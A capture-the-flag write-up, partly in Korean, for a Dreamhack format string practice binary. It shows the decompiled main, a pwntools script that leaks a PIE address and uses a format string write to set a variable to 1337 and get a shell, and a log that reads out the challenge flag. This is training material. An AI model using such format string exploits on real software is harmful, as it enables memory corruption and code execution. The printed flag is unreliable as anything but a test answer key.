Description
Exploit Tech: Format String Bug에서 실습하는 문제입니다.
23.11 update
- binary updated
- Dockerfile is added to the attatchment
checksec
iotfragile@iotfragile:~/CTF/Format_String_Bug$ checksec --file ./fsb_overwrite RELRO STACK CANARY NX PIE RPATH RUNPATH FILE Full RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH ./fsb_overwrite
Solution
- %1$p, %2$p… 이렇게 순차적으로 늘리다가, 0x55~로 시작되는 바이너리의 base에 위치/추정된 메모리주소를 가져온다.
- 어느 위치에 있는 메모리 주소를 가리키는지 파악해서 base를 구하고, fmtstr_payload 함수를 이용해서 changeme를 1337로 덮어씌운다.
fsb_overwrite
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
char format[40]; // [rsp+0h] [rbp-30h] BYREF
unsigned __int64 v4; // [rsp+28h] [rbp-8h]
v4 = __readfsqword(0x28u);
setbuf(_bss_start, 0LL);
while ( 1 )
{
do
{
get_string(format, 32LL);
printf(format);
puts(&byte_2009);
}
while ( changeme != 1337 );
system("/bin/sh");
}
}
solve.py
from pwn import *
#context.log_level = 'debug'
context.bits = 64
warnings.filterwarnings('ignore')
#p = process('fsb_overwrite')
p = remote('host3.dreamhack.games', 8746)
p.sendline("%15$p")
main_address = p.recvline()
main_address = main_address.decode('utf-8')
main_address = int(main_address, 16)
print(hex(main_address))
payload = fmtstr_payload(6, {main_address+0x2d89:1337})
p.sendline(payload)
p.interactive()
Result
iotfragile@iotfragile:~/CTF/Format_String_Bug$ python3 solve.py
[+] Opening connection to host3.dreamhack.games on port 8746: Done
0x55d38e4cc293
[*] Switching to interactive mode
`aaaa\x1c\x
$ ls
flag
fsb_overwrite
$ cat flag
DH{b283dec57b17112a4e9aa6d5499c0f28}
$
FLAG
DH{b283dec57b17112a4e9aa6d5499c0f28}